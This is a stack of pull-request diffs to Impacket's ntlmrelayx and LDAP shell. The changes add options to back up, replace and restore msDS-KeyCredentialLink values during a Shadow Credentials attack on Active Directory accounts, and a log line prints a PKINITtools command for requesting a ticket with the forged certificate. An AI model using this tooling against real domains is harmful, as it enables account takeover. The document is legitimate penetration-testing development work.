### PR TITLE
New --shadow-credentials and --interactive option to backup (and clear) existing msDS-KeyCredentialLink attributes

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -213,7 +213,8 @@ def start_servers(options, threads):
         c.setEnumTemplates(options.enum_templates)
         c.setIsShadowCredentialsAttack(options.shadow_credentials)
         c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type,
-                                      options.cert_outfile_path)
+                          options.cert_outfile_path, options.backup_and_clear,
+                          options.backup_path)
         c.setIsSCCMPoliciesAttack(options.sccm_policies)
         c.setIsSCCMDPAttack(options.sccm_dp)
         c.setSCCMPoliciesOptions(options.sccm_policies_clientname, options.sccm_policies_sleep)
@@ -447,6 +448,10 @@ if __name__ == '__main__':
     shadowcredentials.add_argument('--export-type', action='store', required=False, choices=["PEM", "PFX"], type=lambda choice: choice.upper(), default="PFX",
                                    help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))')
     shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')
+    shadowcredentials.add_argument('--backup-and-clear', action='store_true', required=False,
+                                   help='Backup existing KeyCredentials to JSON, clear msDS-KeyCredentialLink and then set only the new KeyCredential')
+    shadowcredentials.add_argument('--backup-path', action='store', required=False,
+                                   help='Path to backup JSON file used with --backup-and-clear. If .json is omitted it is appended automatically')
 
     # SCCM policies options
     sccmpoliciesoptions = parser.add_argument_group("SCCM Policies attack options")

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -213,7 +213,7 @@ def start_servers(options, threads):
         c.setEnumTemplates(options.enum_templates)
         c.setIsShadowCredentialsAttack(options.shadow_credentials)
         c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type,
-                          options.cert_outfile_path, options.backup_and_clear,
+                          options.cert_outfile_path, options.shadow_replace,
                           options.backup_path)
         c.setIsSCCMPoliciesAttack(options.sccm_policies)
         c.setIsSCCMDPAttack(options.sccm_dp)
@@ -448,10 +448,10 @@ if __name__ == '__main__':
     shadowcredentials.add_argument('--export-type', action='store', required=False, choices=["PEM", "PFX"], type=lambda choice: choice.upper(), default="PFX",
                                    help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))')
     shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')
-    shadowcredentials.add_argument('--backup-and-clear', action='store_true', required=False,
-                                   help='Backup existing KeyCredentials to JSON, clear msDS-KeyCredentialLink and then set only the new KeyCredential')
+    shadowcredentials.add_argument('--shadow-replace', action='store_true', required=False,
+                                   help='Overwrite existing KeyCredentials with the new one instead of appending. Existing KeyCredentials are backed up to JSON first (see --backup-path)')
     shadowcredentials.add_argument('--backup-path', action='store', required=False,
-                                   help='Path to backup JSON file used with --backup-and-clear. If .json is omitted it is appended automatically')
+                                   help='Path to backup JSON file used with --shadow-replace. If .json is omitted it is appended automatically')
 
     # SCCM policies options
     sccmpoliciesoptions = parser.add_argument_group("SCCM Policies attack options")

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -817,10 +817,10 @@ class LdapShell(cmd.Cmd):
  rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
  add_user new_user [parent] - Creates a new user.
  add_user_to_group user group - Adds a user to a group.
+ backup_shadow_creds target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
  change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
  clear_rbcd target - Clear the resource based constrained delegation configuration information.
  clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
- backup_shadow_creds target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
  disable_account user - Disable the user's account.
  enable_account user - Enable the user's account.
  dump - Dumps the domain.
@@ -829,9 +829,10 @@ class LdapShell(cmd.Cmd):
  get_group_users group - Retrieves all members of a group.
  get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
  grant_control [search_base] target grantee - Grant full control on a given target object (sAMAccountName or search filter, optional search base) to the grantee (sAMAccountName).
+ restore_shadow_creds target [backupfile] - Restore shadow credentials on the target (sAMAccountName) from a backup JSON file.
  set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
  set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
-set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
+ set_shadow_creds target - Set shadow credentials on the target object (sAMAccountName).
  start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
  write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
  whoami - get connected user

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -633,6 +633,9 @@ class LdapShell(cmd.Cmd):
         print("Found Target DN: %s" % target.entry_dn)
         print("Target SID: %s\n" % target_sid)
 
+        existing_key_credential_count = len(target['msDS-KeyCredentialLink'].raw_values)
+        print("Found %d existing KeyCredential(s)" % existing_key_credential_count)
+
         key, certificate = shadow_credentials.createSelfSignedX509Certificate(subject=target_name)
         device_id = shadow_credentials.getDeviceId()
         keyCredential = shadow_credentials.KeyCredential(key, deviceId=device_id, currentTime=shadow_credentials.getTicksNow())
@@ -676,6 +679,9 @@ class LdapShell(cmd.Cmd):
         print("Found Target DN: %s" % target.entry_dn)
         print("Target SID: %s\n" % target_sid)
 
+        existing_key_credential_count = len(target['msDS-KeyCredentialLink'].raw_values)
+        print("Found %d existing KeyCredential(s)" % existing_key_credential_count)
+
         self.client.modify(target.entry_dn, {'msDS-KeyCredentialLink':[ldap3.MODIFY_REPLACE, []]})
         if self.client.result['result'] == 0:
             print('Shadow credentials cleared successfully!')
@@ -703,6 +709,14 @@ class LdapShell(cmd.Cmd):
         target = self.client.entries[0]
         print("Found Target DN: %s" % target.entry_dn)
 
+        key_credentials = []
+        for key_credential_value in target['msDS-KeyCredentialLink'].raw_values:
+            if isinstance(key_credential_value, bytes):
+                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
+            key_credentials.append(key_credential_value)
+
+        print("Found %d existing KeyCredential(s)" % len(key_credentials))
+
         if output_file is None:
             sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
             output_file = '%s-keycredential.json' % sanitized_target_name
@@ -712,12 +726,6 @@ class LdapShell(cmd.Cmd):
         output_dir = os.path.dirname(output_file)
         if output_dir and not os.path.exists(output_dir):
             os.makedirs(output_dir, exist_ok=True)
-
-        key_credentials = []
-        for key_credential_value in target['msDS-KeyCredentialLink'].raw_values:
-            if isinstance(key_credential_value, bytes):
-                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
-            key_credentials.append(key_credential_value)
 
         with codecs.open(output_file, 'w', encoding='utf-8') as backup_file:
             json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -19,6 +19,9 @@ import string
 import sys
 import cmd
 import random
+import os
+import json
+import codecs
 import ldap3
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
 from ldap3.utils.conv import escape_filter_chars
@@ -713,6 +716,51 @@ class LdapShell(cmd.Cmd):
 
         print("Exported %d KeyCredential(s) to %s" % (backup_count, output_file))
 
+    def do_restore_shadow_creds(self, line):
+        args = shlex.split(line)
+
+        if len(args) not in (1, 2):
+            raise Exception("Error expecting target name and optional backup JSON file. Received %d arguments instead." % len(args))
+
+        target_name = args[0]
+        backup_file = args[1] if len(args) == 2 else None
+
+        if backup_file is None:
+            sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
+            backup_file = '%s-keycredential.json' % sanitized_target_name
+        elif not backup_file.lower().endswith('.json'):
+            backup_file = '%s.json' % backup_file
+
+        if not os.path.exists(backup_file):
+            raise Exception("Backup file %s does not exist" % backup_file)
+
+        with codecs.open(backup_file, 'r', encoding='utf-8') as backup_filehandle:
+            backup_data = json.load(backup_filehandle)
+
+        key_credentials = backup_data.get('keyCredentials', [])
+        if not key_credentials:
+            raise Exception("No keyCredentials found in backup file %s" % backup_file)
+
+        print("Found %d KeyCredential(s) in %s" % (len(key_credentials), backup_file))
+
+        success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target_name), attributes=['objectSid', 'msDS-KeyCredentialLink'])
+        if success is False or len(self.client.entries) != 1:
+            raise Exception("Error expected only one search result got %d results", len(self.client.entries))
+
+        target = self.client.entries[0]
+        print("Found Target DN: %s" % target.entry_dn)
+
+        self.client.modify(target.entry_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, key_credentials]})
+        if self.client.result['result'] == 0:
+            print('Shadow credentials restored successfully!')
+        else:
+            if self.client.result['result'] == 50:
+                raise Exception('Could not modify object, the server reports insufficient rights: %s', self.client.result['message'])
+            elif self.client.result['result'] == 19:
+                raise Exception('Could not modify object, the server reports a constrained violation: %s', self.client.result['message'])
+            else:
+                raise Exception('The server returned an error: %s', self.client.result['message'])
+
     def search(self, query, *attributes):
         self.client.search(self.domain_dumper.root, query, attributes=attributes)
         for entry in self.client.entries:
@@ -773,6 +821,7 @@ class LdapShell(cmd.Cmd):
  clear_rbcd target - Clear the resource based constrained delegation configuration information.
  clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
  backup_shadow_creads target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
+ restore_shadow_creds target [backupfile] - Restore shadow credentials on the target (sAMAccountName) from a backup JSON file.
  disable_account user - Disable the user's account.
  enable_account user - Enable the user's account.
  dump - Dumps the domain.

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -19,6 +19,9 @@ import string
 import sys
 import cmd
 import random
+import os
+import json
+import codecs
 import ldap3
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
 from ldap3.utils.conv import escape_filter_chars
@@ -656,8 +659,15 @@ class LdapShell(cmd.Cmd):
             print('Attribute msDS-KeyCredentialLink does not exist')
         return
 
-    def do_clear_shadow_creds(self, target):
-        success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target), attributes=['objectSid', 'msDS-KeyCredentialLink'])
+    def do_clear_shadow_creds(self, line):
+        args = shlex.split(line)
+
+        if len(args) != 1:
+            raise Exception("Error expecting target name for shadow credentials cleanup. Received %d arguments instead." % len(args))
+
+        target_name = args[0]
+
+        success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target_name), attributes=['objectSid', 'msDS-KeyCredentialLink'])
         if success is False or len(self.client.entries) != 1:
             raise Exception("Error expected only one search result got %d results", len(self.client.entries))
 
@@ -676,6 +686,43 @@ class LdapShell(cmd.Cmd):
                 raise Exception('Could not modify object, the server reports a constrained violation: %s', self.client.result['message'])
             else:
                 raise Exception('The server returned an error: %s', self.client.result['message'])
+
+    def do_backup_shadow_creads(self, line):
+        args = shlex.split(line)
+
+        if len(args) not in (1, 2):
+            raise Exception("Error expecting target name and optional output file. Received %d arguments instead." % len(args))
+
+        target_name = args[0]
+        output_file = args[1] if len(args) == 2 else None
+
+        success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target_name), attributes=['objectSid', 'msDS-KeyCredentialLink'])
+        if success is False or len(self.client.entries) != 1:
+            raise Exception("Error expected only one search result got %d results", len(self.client.entries))
+
+        target = self.client.entries[0]
+        print("Found Target DN: %s" % target.entry_dn)
+
+        if output_file is None:
+            sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
+            output_file = '%s-keycredential.json' % sanitized_target_name
+        elif not output_file.lower().endswith('.json'):
+            output_file = '%s.json' % output_file
+
+        output_dir = os.path.dirname(output_file)
+        if output_dir and not os.path.exists(output_dir):
+            os.makedirs(output_dir, exist_ok=True)
+
+        key_credentials = []
+        for key_credential_value in target['msDS-KeyCredentialLink'].raw_values:
+            if isinstance(key_credential_value, bytes):
+                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
+            key_credentials.append(key_credential_value)
+
+        with codecs.open(output_file, 'w', encoding='utf-8') as backup_file:
+            json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)
+
+        print("Exported %d KeyCredential(s) to %s" % (len(key_credentials), output_file))
 
     def search(self, query, *attributes):
         self.client.search(self.domain_dumper.root, query, attributes=attributes)
@@ -736,6 +783,7 @@ class LdapShell(cmd.Cmd):
  change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
  clear_rbcd target - Clear the resource based constrained delegation configuration information.
  clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
+ backup_shadow_creads target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
  disable_account user - Disable the user's account.
  enable_account user - Enable the user's account.
  dump - Dumps the domain.

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -791,7 +791,7 @@ class LdapShell(cmd.Cmd):
  change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
  clear_rbcd target - Clear the resource based constrained delegation configuration information.
  clear_shadow_creds target - Clear shadow credentials on the target (sAMAccountName).
- backup_shadow_creads target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
+ backup_shadow_creds target [outfile] - Backup shadow credentials from the target (sAMAccountName) into a single JSON file.
  disable_account user - Disable the user's account.
  enable_account user - Enable the user's account.
  dump - Dumps the domain.

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -19,9 +19,6 @@ import string
 import sys
 import cmd
 import random
-import os
-import json
-import codecs
 import ldap3
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
 from ldap3.utils.conv import escape_filter_chars
@@ -709,28 +706,12 @@ class LdapShell(cmd.Cmd):
         target = self.client.entries[0]
         print("Found Target DN: %s" % target.entry_dn)
 
-        key_credentials = []
-        for key_credential_value in target['msDS-KeyCredentialLink'].raw_values:
-            if isinstance(key_credential_value, bytes):
-                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
-            key_credentials.append(key_credential_value)
+        existing_values = target['msDS-KeyCredentialLink'].raw_values
+        print("Found %d existing KeyCredential(s)" % len(existing_values))
 
-        print("Found %d existing KeyCredential(s)" % len(key_credentials))
+        backup_count, output_file = shadow_credentials.backupKeyCredentialsToJSON(target_name, existing_values, output_file)
 
-        if output_file is None:
-            sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
-            output_file = '%s-keycredential.json' % sanitized_target_name
-        elif not output_file.lower().endswith('.json'):
-            output_file = '%s.json' % output_file
-
-        output_dir = os.path.dirname(output_file)
-        if output_dir and not os.path.exists(output_dir):
-            os.makedirs(output_dir, exist_ok=True)
-
-        with codecs.open(output_file, 'w', encoding='utf-8') as backup_file:
-            json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)
-
-        print("Exported %d KeyCredential(s) to %s" % (len(key_credentials), output_file))
+        print("Exported %d KeyCredential(s) to %s" % (backup_count, output_file))
 
     def search(self, query, *attributes):
         self.client.search(self.domain_dumper.root, query, attributes=attributes)

--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -693,7 +693,7 @@ class LdapShell(cmd.Cmd):
             else:
                 raise Exception('The server returned an error: %s', self.client.result['message'])
 
-    def do_backup_shadow_creads(self, line):
+    def do_backup_shadow_creds(self, line):
         args = shlex.split(line)
 
         if len(args) not in (1, 2):

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -336,12 +336,6 @@ class LDAPAttack(ProtocolAttack):
                         currentShadowCredentialsTarget, existing_values, self.config.ShadowCredentialsBackupPath)
                     LOG.info('Exported %d existing KeyCredential(s) to %s', backup_count, backup_path)
 
-                    LOG.info('Clearing existing msDS-KeyCredentialLink values')
-                    self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, []]})
-                    if self.client.result['result'] != 0:
-                        self._handleShadowCredentialModifyError()
-                        return
-
                 new_values = [shadow_credentials.toDNWithBinary2String(keyCredential.dumpBinary(), target_dn)]
             else:
                 new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [shadow_credentials.toDNWithBinary2String( keyCredential.dumpBinary(), target_dn )]
@@ -376,12 +370,7 @@ class LDAPAttack(ProtocolAttack):
                     LOG.info("python3 PKINITtools/gettgtpkinit.py -cert-pfx %s.pfx -pfx-pass %s %s/%s %s.ccache" % (path, password, domain, currentShadowCredentialsTarget, path))
                     delegatePerformed.append(currentShadowCredentialsTarget)
             else:
-                if self.client.result['result'] == 50:
-                    LOG.error('Could not modify object, the server reports insufficient rights: %s' % self.client.result['message'])
-                elif self.client.result['result'] == 19:
-                    LOG.error('Could not modify object, the server reports a constrained violation: %s' % self.client.result['message'])
-                else:
-                    LOG.error('The server returned an error: %s' % self.client.result['message'])
+                self._handleShadowCredentialModifyError()
         except IndexError:
             LOG.info('Attribute msDS-KeyCredentialLink does not exist')
         return

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -276,29 +276,6 @@ class LDAPAttack(ProtocolAttack):
         else:
             LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result)))
 
-    def _backupShadowCredentials(self, target_name, existing_values):
-        backup_path = self.config.ShadowCredentialsBackupPath
-        if not backup_path:
-            sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
-            backup_path = '%s-keycredential.json' % sanitized_target_name
-        elif not backup_path.lower().endswith('.json'):
-            backup_path = '%s.json' % backup_path
-
-        backup_dir = os.path.dirname(backup_path)
-        if backup_dir and not os.path.exists(backup_dir):
-            os.makedirs(backup_dir, exist_ok=True)
-
-        key_credentials = []
-        for key_credential_value in existing_values:
-            if isinstance(key_credential_value, bytes):
-                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
-            key_credentials.append(key_credential_value)
-
-        with codecs.open(backup_path, 'w', encoding='utf-8') as backup_file:
-            json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)
-
-        LOG.info('Exported %d existing KeyCredential(s) to %s', len(key_credentials), backup_path)
-
     def _handleShadowCredentialModifyError(self):
         if self.client.result['result'] == 50:
             LOG.error('Could not modify object, the server reports insufficient rights: %s' % self.client.result['message'])
@@ -355,7 +332,9 @@ class LDAPAttack(ProtocolAttack):
             LOG.info('Found %d existing KeyCredential(s) on target object', len(existing_values))
             if self.config.ShadowCredentialsBackupAndClear:
                 if len(existing_values) > 0:
-                    self._backupShadowCredentials(currentShadowCredentialsTarget, existing_values)
+                    backup_count, backup_path = shadow_credentials.backupKeyCredentialsToJSON(
+                        currentShadowCredentialsTarget, existing_values, self.config.ShadowCredentialsBackupPath)
+                    LOG.info('Exported %d existing KeyCredential(s) to %s', backup_count, backup_path)
 
                     LOG.info('Clearing existing msDS-KeyCredentialLink values')
                     self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, []]})

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -330,7 +330,7 @@ class LDAPAttack(ProtocolAttack):
         try:
             existing_values = results['raw_attributes'].get('msDS-KeyCredentialLink', [])
             LOG.info('Found %d existing KeyCredential(s) on target object', len(existing_values))
-            if self.config.ShadowCredentialsBackupAndClear:
+            if self.config.ShadowCredentialsReplace:
                 if len(existing_values) > 0:
                     backup_count, backup_path = shadow_credentials.backupKeyCredentialsToJSON(
                         currentShadowCredentialsTarget, existing_values, self.config.ShadowCredentialsBackupPath)

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -351,9 +351,9 @@ class LDAPAttack(ProtocolAttack):
             return
 
         try:
+            existing_values = results['raw_attributes'].get('msDS-KeyCredentialLink', [])
+            LOG.info('Found %d existing KeyCredential(s) on target object', len(existing_values))
             if self.config.ShadowCredentialsBackupAndClear:
-                existing_values = results['raw_attributes'].get('msDS-KeyCredentialLink', [])
-                LOG.info('Found %d existing KeyCredential(s) on target object', len(existing_values))
                 if len(existing_values) > 0:
                     self._backupShadowCredentials(currentShadowCredentialsTarget, existing_values)
 

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -276,6 +276,37 @@ class LDAPAttack(ProtocolAttack):
         else:
             LOG.error('Failed to add user to %s group: %s' % (groupName, str(self.client.result)))
 
+    def _backupShadowCredentials(self, target_name, existing_values):
+        backup_path = self.config.ShadowCredentialsBackupPath
+        if not backup_path:
+            sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
+            backup_path = '%s-keycredential.json' % sanitized_target_name
+        elif not backup_path.lower().endswith('.json'):
+            backup_path = '%s.json' % backup_path
+
+        backup_dir = os.path.dirname(backup_path)
+        if backup_dir and not os.path.exists(backup_dir):
+            os.makedirs(backup_dir, exist_ok=True)
+
+        key_credentials = []
+        for key_credential_value in existing_values:
+            if isinstance(key_credential_value, bytes):
+                key_credential_value = key_credential_value.decode('utf-8', errors='replace')
+            key_credentials.append(key_credential_value)
+
+        with codecs.open(backup_path, 'w', encoding='utf-8') as backup_file:
+            json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)
+
+        LOG.info('Exported %d existing KeyCredential(s) to %s', len(key_credentials), backup_path)
+
+    def _handleShadowCredentialModifyError(self):
+        if self.client.result['result'] == 50:
+            LOG.error('Could not modify object, the server reports insufficient rights: %s' % self.client.result['message'])
+        elif self.client.result['result'] == 19:
+            LOG.error('Could not modify object, the server reports a constrained violation: %s' % self.client.result['message'])
+        else:
+            LOG.error('The server returned an error: %s' % self.client.result['message'])
+
 
     def shadowCredentialsAttack(self, domainDumper):
         currentShadowCredentialsTarget = self.config.ShadowCredentialsTarget
@@ -318,8 +349,24 @@ class LDAPAttack(ProtocolAttack):
         if not results:
             LOG.error('Could not query target user properties')
             return
+
         try:
-            new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [shadow_credentials.toDNWithBinary2String( keyCredential.dumpBinary(), target_dn )]
+            if self.config.ShadowCredentialsBackupAndClear:
+                existing_values = results['raw_attributes'].get('msDS-KeyCredentialLink', [])
+                LOG.info('Found %d existing KeyCredential(s) on target object', len(existing_values))
+                if len(existing_values) > 0:
+                    self._backupShadowCredentials(currentShadowCredentialsTarget, existing_values)
+
+                    LOG.info('Clearing existing msDS-KeyCredentialLink values')
+                    self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, []]})
+                    if self.client.result['result'] != 0:
+                        self._handleShadowCredentialModifyError()
+                        return
+
+                new_values = [shadow_credentials.toDNWithBinary2String(keyCredential.dumpBinary(), target_dn)]
+            else:
+                new_values = results['raw_attributes']['msDS-KeyCredentialLink'] + [shadow_credentials.toDNWithBinary2String( keyCredential.dumpBinary(), target_dn )]
+
             LOG.info("Updating the msDS-KeyCredentialLink attribute of %s" % currentShadowCredentialsTarget)
             self.client.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
             if self.client.result['result'] == 0:

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -111,7 +111,7 @@ class NTLMRelayxConfig:
         self.ShadowCredentialsPFXPassword = None
         self.ShadowCredentialsExportType = None
         self.ShadowCredentialsOutfilePath = None
-        self.ShadowCredentialsBackupAndClear = False
+        self.ShadowCredentialsReplace = False
         self.ShadowCredentialsBackupPath = None
 
         # SCCM attacks options
@@ -276,13 +276,13 @@ class NTLMRelayxConfig:
         self.IsShadowCredentialsAttack = IsShadowCredentialsAttack
 
     def setShadowCredentialsOptions(self, ShadowCredentialsTarget, ShadowCredentialsPFXPassword, ShadowCredentialsExportType,
-                                    ShadowCredentialsOutfilePath, ShadowCredentialsBackupAndClear=False,
+                                    ShadowCredentialsOutfilePath, ShadowCredentialsReplace=False,
                                     ShadowCredentialsBackupPath=None):
         self.ShadowCredentialsTarget = ShadowCredentialsTarget
         self.ShadowCredentialsPFXPassword = ShadowCredentialsPFXPassword
         self.ShadowCredentialsExportType = ShadowCredentialsExportType
         self.ShadowCredentialsOutfilePath = ShadowCredentialsOutfilePath
-        self.ShadowCredentialsBackupAndClear = ShadowCredentialsBackupAndClear
+        self.ShadowCredentialsReplace = ShadowCredentialsReplace
         self.ShadowCredentialsBackupPath = ShadowCredentialsBackupPath
     
     def setIsSCCMPoliciesAttack(self, isSCCMPoliciesAttack):

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -111,6 +111,8 @@ class NTLMRelayxConfig:
         self.ShadowCredentialsPFXPassword = None
         self.ShadowCredentialsExportType = None
         self.ShadowCredentialsOutfilePath = None
+        self.ShadowCredentialsBackupAndClear = False
+        self.ShadowCredentialsBackupPath = None
 
         # SCCM attacks options
         self.isSCCMPoliciesAttack = False
@@ -273,11 +275,15 @@ class NTLMRelayxConfig:
     def setIsShadowCredentialsAttack(self, IsShadowCredentialsAttack):
         self.IsShadowCredentialsAttack = IsShadowCredentialsAttack
 
-    def setShadowCredentialsOptions(self, ShadowCredentialsTarget, ShadowCredentialsPFXPassword, ShadowCredentialsExportType, ShadowCredentialsOutfilePath):
+    def setShadowCredentialsOptions(self, ShadowCredentialsTarget, ShadowCredentialsPFXPassword, ShadowCredentialsExportType,
+                                    ShadowCredentialsOutfilePath, ShadowCredentialsBackupAndClear=False,
+                                    ShadowCredentialsBackupPath=None):
         self.ShadowCredentialsTarget = ShadowCredentialsTarget
         self.ShadowCredentialsPFXPassword = ShadowCredentialsPFXPassword
         self.ShadowCredentialsExportType = ShadowCredentialsExportType
         self.ShadowCredentialsOutfilePath = ShadowCredentialsOutfilePath
+        self.ShadowCredentialsBackupAndClear = ShadowCredentialsBackupAndClear
+        self.ShadowCredentialsBackupPath = ShadowCredentialsBackupPath
     
     def setIsSCCMPoliciesAttack(self, isSCCMPoliciesAttack):
         self.isSCCMPoliciesAttack = isSCCMPoliciesAttack

--- a/impacket/examples/ntlmrelayx/utils/shadow_credentials.py
+++ b/impacket/examples/ntlmrelayx/utils/shadow_credentials.py
@@ -7,6 +7,8 @@ import time
 import hashlib
 import binascii
 import os
+import json
+import codecs
 
 # code based on:
 # 
@@ -122,6 +124,29 @@ class KeyCredential():
 def toDNWithBinary2String( binaryData, owner ):
     hexdata = binascii.hexlify(binaryData).decode("UTF-8")
     return "B:%d:%s:%s" % (len(binaryData)*2,hexdata,owner)
+
+def backupKeyCredentialsToJSON(target_name, existing_values, output_path=None):
+    if output_path is None:
+        sanitized_target_name = target_name.replace('\\', '_').replace('/', '_').replace(':', '_')
+        output_path = '%s-keycredential.json' % sanitized_target_name
+    elif not output_path.lower().endswith('.json'):
+        output_path = '%s.json' % output_path
+
+    backup_dir = os.path.dirname(output_path)
+    if backup_dir and not os.path.exists(backup_dir):
+        os.makedirs(backup_dir, exist_ok=True)
+
+    key_credentials = []
+    for key_credential_value in existing_values:
+        if isinstance(key_credential_value, bytes):
+            key_credential_value = key_credential_value.decode('utf-8', errors='replace')
+        key_credentials.append(key_credential_value)
+
+    with codecs.open(output_path, 'w', encoding='utf-8') as backup_file:
+        json.dump({'keyCredentials': key_credentials}, backup_file, indent=4)
+
+    return len(key_credentials), output_path
+
 
 def exportPFX(certificate,key,path_to_file,password):
     if len(os.path.dirname(path_to_file)) != 0:


### PR DESCRIPTION
This PR adds two new options to the Shadow Credentials attack flow: --backup-and-clear and --backup-path. When backup-and-clear is enabled, the tool now exports them to a single JSON backup file (compatible with pyWhisker import format), clears the attribute, and then writes the new KeyCredential. Without the flag, the original behavior is preserved. Furthermore, it now always reports how many msDS-KeyCredentialLink entries already exist. 

In addition, the LDAP shell now includes a backup_shadow_creads command to export existing Shadow Credentials, and clear_shadow_creds was updated to accept the target via command arguments for consistent shell usage. Also, do_clear_shadow_creds and do_backup_shadow_creads now report how many msDS-KeyCredentialLink entries already existed before the operation, because that is an importation information.

This can be used to safely replace Shadow Credentials while keeping a recoverable backup for rollback.